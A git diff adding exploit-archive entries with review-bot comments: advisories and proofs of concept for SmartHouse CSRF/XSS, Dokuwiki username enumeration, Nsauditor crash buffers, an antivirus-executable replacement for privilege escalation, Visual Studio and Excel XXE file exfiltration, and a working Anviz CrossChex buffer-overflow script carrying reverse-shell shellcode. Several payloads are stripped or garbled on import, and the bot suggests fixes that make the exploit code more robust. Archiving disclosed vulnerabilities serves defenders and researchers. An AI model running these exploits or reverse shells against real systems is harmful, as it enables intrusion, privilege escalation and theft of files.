diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
new file mode 100644
index 000000000..bcd16c8d8
--- /dev/null
+++ b/exploits/php/webapps/47730.txt
@@ -0,0 +1,123 @@
+# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
+# Discovery by: LiquidWorm
+# Date: 2019-12-02
+# Vendor Homepage: http://www.gavazzi-automation.com
+# Tested Version: 6.5.33.17072501
+# CVE: N/A
+# Advisory ID: ZSL-2019-5543
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
+
+
+Vendor: Carlo Gavazzi Automation S.p.A
+Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
+Affected version: Web-app: 6.5.33.17072501
+ Web-app: 6.5.32.17062101
+ Web-app: 6.2.3.16102701
+ Web-app: 5.5.3.160421101
+ Web-app: 5.3.3.15120101
+ Release: 1.0.5.1
+ Release: 1.0.5.0
+ Release: 1.0.3.5
+ Release: 1.0.3.2
+
+Summary: Carlo Gavazzi is an international company that develops, manufactures
+and sells electrical automation components. Our products are used in industrial
+automation and real estate automation. Smart-house is based on a system that we
+have developed and produced since 1986, mainly for industrial-related installations.
+Our system is present in more than 150,000 installations. For a few years now, we
+have focused our development on smart electrical installations for home and property
+automation. Smart-house is currently installed in both villas and commercial properties.
+
+Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
+allows users to perform certain actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site. Input passed
+to several GET/POST parameters is not properly sanitised before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session
+in context of an affected site.
+
+Tested on: Apache
+ PHP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2019-5543
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+
+01.11.2019
+
+--
+
+
+Reflected XSS (GET):
+--------------------
+
+1. http://192.168.0.24/app/index.php?error=Waddup"> (pre-auth)
+2. http://192.168.0.24/app/messagepage.php?msg= (pre-auth)
+3. http://192.168.0.24/app/detaf.php?p=0&l=50">&f=5658 (post-auth)
+4. http://192.168.0.24/app/detaf.php?p=0">&l=50&f=5658 (post-auth)
+5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction">&grpl=1 (post-auth)
+
+
+CSRF set temperature:
+---------------------
+
+
+
+
+
+
+
+
+Stored XSS (POST):
+------------------
+
+
+
+
+
+
+
+
+Reflected XSS (POST):
+---------------------
+
+
+
+
+
+
\ No newline at end of file
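Review bot: The PoC sections headed `CSRF set temperature:`, `Stored XSS (POST):` and `Reflected XSS (POST):` are empty, and the five reflected-GET URLs end in a bare `">` with nothing after it, so the HTML form and script markup appears to have been stripped when the advisory was imported; the file should be re-imported from the advisory URL in the header (with the markup escaped) so that each section carries the request it describes. The same stripping affects the other new files in this commit that embed markup or C: `exploits/windows/local/47733.txt` (both `#include` lines have lost their header names), `exploits/xml/local/47729.txt` and `exploits/xml/local/47735.txt` (only `%dtd;]>` and `&send;` survive of the DOCTYPE block). Without the request bodies the CSRF finding cannot be tied to specific endpoints or parameters, which is what a defender needs in order to check whether a deployment validates anti-CSRF tokens on those actions.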
diff --git a/exploits/php/webapps/47731.txt b/exploits/php/webapps/47731.txt
new file mode 100644
index 000000000..e78a79dc7
--- /dev/null
+++ b/exploits/php/webapps/47731.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
+# Date: 2019-12-01
+# Exploit Author: Talha ŞEN
+# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
+# Software Link: https://download.dokuwiki.org/
+# Version: 2018-04-22b "Greebo"
+# Tested on:
+# Alpine Linux 3.5 (docker image)
+# PHP 5.6.30
+# Apache/2.4.25 (Unix)
+# CVE :
+
+# At login page there is a "set new password" page as below:
+# Forgotten your password? Get a new one: Set new password
+# At this page there is username enumeration vulnerability.
+# Testing for non-valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=sss
+
+# Response for non-valid user(sss):
+
+Sorry, we can't find this user in our database.
+
+========================================================================
+
+# Testing for valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=admin
+
+# Response for valid user (admin):
+
+There was an unexpected problem communicating with SMTP: Could not open SMTP Port.
+Looks like there was an error on sending the password mail. Please contact the admin!
\ No newline at end of file
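Review bot: The enumeration oracle demonstrated here is the SMTP error text at the end of the file, which only appears because mail delivery failed in the test environment; the advisory does not show the valid-user response when SMTP works, so the finding as written is environment-dependent and a line giving the success-path response (or stating that it is also distinguishable from `Sorry, we can't find this user in our database.`) is needed. The two requests also omit the `Host` and `Content-Type` headers, so they are not reproducible as shown, and `sectok=` is sent empty without saying whether the token is checked on this action. The `# CVE :` field is left blank; `N/A` as in the sibling advisories keeps the header consistent. The usual remediation for this class of issue is a uniform response for existing and non-existing accounts, which is worth stating so the entry is useful beyond the proof.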
diff --git a/exploits/windows/dos/47728.py b/exploits/windows/dos/47728.py
new file mode 100755
index 000000000..0f3f7639e
--- /dev/null
+++ b/exploits/windows/dos/47728.py
@@ -0,0 +1,35 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+# PoC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
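Review bot: The `try` block leaves `dos.txt` open if `f.write` raises, and the bare `except:` also swallows `KeyboardInterrupt` and `SystemExit` while discarding the real error; `with open("dos.txt", "w") as f:` / `f.write(buffer)` followed by `except IOError as e: print "File cannot be created: %s" % e` handles write and close together and reports why it failed. The `#!/usr/bin/env python` shebang sits on the line before `buffer`, not on the first line of the file, so it has no effect, and the `print` statements are Python 2 only, which the header should state. The PoC steps are numbered 1, 3, 2, 6, 5. The same code and the same defects appear verbatim in `exploits/windows/dos/47732.py` in this commit.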
diff --git a/exploits/windows/dos/47732.py b/exploits/windows/dos/47732.py
new file mode 100755
index 000000000..2c52b2d2e
--- /dev/null
+++ b/exploits/windows/dos/47732.py
@@ -0,0 +1,37 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+# Email : blackwolf@post.com
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
+# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
+# network for all potential methods that a hacker might use to attack it and create a report of potential
+# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
+# network management in enterprise environments by enabling IT personnel and systems administrators gather
+# a wide range of information from all the computers in the network without installing server-side applications
+# on these computers and create a report of potential problems that were found.
+
+# POC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47733.txt b/exploits/windows/local/47733.txt
new file mode 100644
index 000000000..2c4ac32b5
--- /dev/null
+++ b/exploits/windows/local/47733.txt
@@ -0,0 +1,133 @@
+# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.maxpcsecure.com
+# Tested Version: 19.0.4.020
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.maxpcsecure.com
+
+
+[Affected Product Code Base]
+Max Secure Anti Virus Plus - 19.0.4.020
+
+File hash: ab1dda23ad3955eb18fdb75f3cbc308a
+msplusx64.exe
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
+Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
+
+C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
+C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
+ BUILTIN\Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Exploit/POC]
+#include
+#include
+#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
+#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
+#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
+
+/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+ DWORD dwAttrib = GetFileAttributes(szPath);
+ return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+
+ if(!FileExists(DISABLED_TARGET)){
+ CopyFile(TARGET, TMP, FALSE);
+ Sleep(1000);
+ CopyFile(TMP, DISABLED_TARGET, FALSE);
+ printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
+ Sleep(1000);
+ printf("[+] Disabled MaxSDUI.exe ...\n");
+ Sleep(300);
+ }else{
+ PWNED=TRUE;
+ }
+
+ if(!PWNED){
+ char fname[MAX_PATH];
+ char newLoc[]=TARGET;
+ DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+ if (size){
+ printf("[+] Copying exploit to vuln dir...\n");
+ Sleep(1000);
+ CopyFile(fname, TARGET, FALSE);
+ printf("[+] Replaced legit Max Secure EXE...\n");
+ Sleep(2000);
+ printf("[+] Done!\n");
+ MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
+ Sleep(1000);
+ exit(0);
+ }
+ }else{
+ if(FileExists(TMP)){
+ remove(TMP);
+ }
+ printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
+ printf("[+] hyp3rlinx\n");
+ system("pause");
+ }
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=DXSV5geXkTw
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: November 19, 2019
+Vendor: "received a reply they will fix soon"
+Status request: November 24, 2019
+No replies other than automated response.
+November 29, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
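Review bot: The PoC's `CopyFile` and `MoveFile` calls discard their return values, so `[+] Replaced legit Max Secure EXE...` and `[+] Done!` are printed even when the copy into the install directory failed; `if (!CopyFile(fname, TARGET, FALSE)) { printf("[-] CopyFile failed: %lu\n", GetLastError()); return; }` would make the output reflect what actually happened. `char newLoc[]=TARGET;` is never used and can be dropped, and `void main(void)` should be `int main(void)` with a `return 0;` for a conforming build. From the defender's side the `cacls` listing is the useful artefact: the `(ID)` flag on the `BUILTIN\Users:(ID)F` entry shows the full-control grant is inherited from the installation folder, so the fix belongs on the folder ACL rather than on individual files, and file-write auditing on that folder would surface this kind of replacement.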
diff --git a/exploits/windows/local/47734.py b/exploits/windows/local/47734.py
new file mode 100755
index 000000000..c29323419
--- /dev/null
+++ b/exploits/windows/local/47734.py
@@ -0,0 +1,125 @@
+# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
+# Date: 2019-11-30
+# Exploit Author: Luis Catarino & Pedro Rodrigues
+# Vendor Homepage: https://www.anviz.com/
+# Software Link: https://www.anviz.com/download.html
+# Version: Crosschex Standard x86 <= V4.3.12
+# Tested on: 4.3.8.0, 4.3.12
+# CVE : N/A
+# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html
+
+import socket
+import time
+import sys
+import binascii
+
+# Scapy for the broadcast packet with custom sport
+from scapy.all import Raw,IP,Dot1Q,UDP,Ether
+import scapy.all
+
+# shellcode working calc.exe
+calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
+calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
+calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
+calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
+calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
+
+# shellcode windows x86 reverse_shell
+shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
+shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
+shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
+shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
+shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"
+
+# shellcode windows x86 reverse_shell (part_2)
+shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
+shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
+shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
+shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
+shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
+shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
+shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
+shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
+shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
+shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+
+def ipToShellcode(ip):
+ a = ip.split('.')
+ b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
+ b = b.replace("0x","")
+ return binascii.unhexlify(b)
+
+# sport has to be 5060
+def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
+ request = b"A"*77 # Original payload substitute
+ request += b"B"*184
+ request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe
+ request += b"A"*4
+ # 269 bytes
+
+ if len(sys.argv) > 2:
+ request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
+ else:
+ request = request + calculator_payload
+
+ scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )
+
+def setFuzzUDPServer(ip='', port=5050, timeout=150):
+ try :
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ except:
+ print('[!] Failed to create server socket')
+
+ try:
+ s.bind(('', port))
+ except:
+ print('[*] Server socket bind failed')
+ sys.exit()
+
+ print('[*] Waiting for crosschex')
+ s.settimeout(timeout)
+ timeout = time.time() + timeout
+ responses = []
+
+ while True:
+ if time.time() > timeout:
+ break
+ try:
+ response = s.recvfrom(1024)
+ print(response)
+ responses.append(response)
+ sendFuzzingUDPBroadcast(ip=ip)
+ response = s.recvfrom(1024)
+ except socket.timeout:
+ print("[!] Error with UDP server")
+
+ s.close()
+ return responses
+
+nargs = len(sys.argv)
+
+if nargs < 2:
+ print("[*] Usage: python3 %s []\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445")
+ sys.exit(0)
+
+setFuzzUDPServer()
\ No newline at end of file
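Review bot: In `setFuzzUDPServer` the bare `except:` around `socket.socket(...)` prints its message and then falls through to `s.bind(...)`, so a failed socket creation surfaces as a `NameError` on `s` instead of the intended report; `except OSError as e: print('[!] Failed to create server socket: %s' % e); sys.exit(1)` and the same narrowing for the bind failure (which should also close the socket before exiting) give a clean exit path. The usage message in the `if nargs < 2:` branch contains a `%s` placeholder but is never formatted with `sys.argv[0]`, so it prints the literal `%s`, and the argument list between `python3 %s` and `\n\t` appears to have been stripped on import. `scapy` is a third-party dependency that the header should list alongside the Python 3 requirement.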
diff --git a/exploits/xml/local/47729.txt b/exploits/xml/local/47729.txt
new file mode 100644
index 000000000..3b18accf6
--- /dev/null
+++ b/exploits/xml/local/47729.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Visual Studio 2008 - XML External Entity Injection
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Software Link: Visual Studio 2008 Express IDE
+# Tested Version: 2008
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Visual Studio 2008 Express IDE
+vcsetup.exe
+File hash: 62f764849e8fcdf8bfbc342685641304
+Download: http://go.microsoft.com/?linkid=7729279
+
+
+[Vulnerability Type]
+XML External Entity Injection 0Day
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
+By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
+remote attackers server.
+
+Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get
+associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
+
+[Vuln XXE file types]
+.snippet
+.i
+.s
+.asm
+.disco
+.lst
+.inc
+.srf
+.wsdl
+.rgs
+.xml
+
+This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
+
+
+[References]
+https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
+
+
+[Exploit/POC]
+"Evil.snippet" or any of the extensions mentioned above.
+
+
+
+
+%dtd;]>
+&send;
+
+
+"payload.dtd"
+
+
+">
+%all;
+
+
+python -m SimpleHTTPServer
+python -m http.server (Python3)
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=QOZlwzsbPrk
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: 3/24/2017
+MSRC sent me link to "Definition of a Security Vulnerability"
+Also Product is also not supported anymore.
+December 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
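Review bot: The `[Network Access]` section says `Remote`, but the file is placed under `exploits/xml/local/` and indexed as `local` in the `files_exploits.csv` hunk of this same commit; one of the two should change, and `local` fits the described trigger (a user opening a file), with `Remote` describing only where the data is sent. The content under `"payload.dtd"` is a single `">` line, so which entity is declared in which file is not recoverable from the text as imported. It would also help to state the root cause in one line — the IDE's XML handling resolves external entities from DTDs for these file types — so that the entry names the condition a defender can check for, not just the list of extensions.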
diff --git a/exploits/xml/local/47735.txt b/exploits/xml/local/47735.txt
new file mode 100644
index 000000000..422886185
--- /dev/null
+++ b/exploits/xml/local/47735.txt
@@ -0,0 +1,107 @@
+# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Tested Version: 2016 v1901
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Excel 2016 v1901
+
+Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
+It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.
+
+
+[CVE]
+N/A
+
+
+[Vulnerability Type]
+Error Import Based XML External Entity Injection
+
+
+[Security Issue]
+Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
+Html page" functionality upon receiving errors importing a specially crafted XML file.
+
+This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.
+
+Tested successfuly Windows 10 .NET framework version v4.0.30319.
+
+C:\>dir /b %windir%\Microsoft.NET\Framework\v*
+v4.0.30319
+
+
+[Exploit/POC]
+Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'
+
+1) You will get error like:
+
+"Error:
+
+Unable to connect
+
+We encountered an error while trying to connect.
+
+The user will then get an option to 'Edit' where they can import the file as an HTML file
+
+Result Local data can be exfiltrated to remote server"
+
+2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel
+
+User has choose to import as HTML then XXE attack will succeed:
+
+e.g.
+
+127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
+/1.1" 200 -
+
+
+Malicious XML file to load as New Data Query
+
+"test.xml"
+
+
+
+
+%dtd;]>
+&send;
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: May 10, 2019
+MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
+Engineering Team may or may not fix in a future version of the release."
+November 30, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index abb7ab111..f0d1b99a4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port
47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
+47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
+47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
+47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
